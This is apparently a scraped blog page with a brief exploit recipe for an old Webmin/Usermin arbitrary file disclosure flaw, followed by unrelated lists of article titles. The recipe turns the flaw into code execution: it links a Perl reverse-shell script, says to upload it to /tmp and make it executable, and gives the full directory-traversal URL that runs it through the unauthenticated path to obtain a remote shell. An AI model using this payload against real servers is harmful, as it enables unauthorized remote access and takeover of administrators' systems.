Webmin LFD to LFI
2024-08-31 06:29:01
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (Perl)
Actually it's not just a local file disclosure vulnerability, It's a LFI-like vulnerability. We can get a shell if we can upload a file.
Upload a Perl reverse shell to /tmp/Reverse.cgi, and add execute privilege:
https://github.com/xiaoxiaoleo/xiao-webshell/blob/master/perl/Reverse.pl
Then access in web broswer:
http://<target>/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/tmp/Reverse.cgi
Get the reverse shell.
最新文章
- 浅谈利用SQLite存储离散瓦片的思路和实现方法
- signalr遇到的问题汇总
- redis使用简介
- RCP:eclipse的DEBUG机制
- Shader Overview
- paramiko堡垒机、线程及锁
- php redis安装
- MVC返回http状态码
- Prism - WPF MVVM(Model-View-ViewModel)设计模式【学习】
- MySQL execute dynamic sql script.
- NHibernate 数据查询之QueryOver<;T>;
- C++用new创建对象和不用new创建对象的区别解析
- sun.misc jar包
- ZZCMS v8.2 前台Insert注入+任意文件删除
- SSM 开发 Tars
- django的模板语言中一些之前没有用过的小点
- Android应用流量测试
- 如何实现Asp与Asp.Net共享Session
- 【跟着stackoverflow学Pandas】“Large data” work flows using pandas-pandas大数据处理流程
- 主流ETL工具
热门文章
- 单行文字溢出和多行文字溢出省略号显示的CSS样式
- Java取两个变量不为空的变量的简便方法!
- 【bzoj2259】[Oibh]新型计算机 堆优化Dijkstra
- wsgiref 源码解析
- [洛谷P3224][HNOI2012]永无乡
- [USACO06NOV]玉米田Corn Fields 状压DP
- [NOI2009]诗人小G 决策单调性优化DP
- POJ2142:The Balance——题解
- [LNOI] 相逢是问候 || 扩展欧拉函数+线段树
- C++STL简介